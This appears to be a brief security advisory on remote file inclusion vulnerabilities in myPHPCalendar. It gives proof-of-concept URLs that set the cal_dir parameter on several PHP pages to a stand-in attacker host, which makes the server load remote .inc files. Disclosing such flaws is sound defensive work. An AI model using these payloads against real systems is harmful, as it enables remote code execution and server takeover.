|
|
Multiple myPHPCalendar File Include Vulnerabilities
The following proof of concept has been supplied: http://www.example.com/admin.php?cal_dir=http://[attacker]/ http://www.example.com/contacts.php?cal_dir=http://[attacker]/ http://www.example.com/convert-date.php?cal_dir=http://[attacker]/ will include the files : http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc and http://www.example.com/index.php?cal_dir=http://[attacker]/ will include the files : http://[target]/globals.inc http://[target]/sql.inc |
|
Privacy Statement |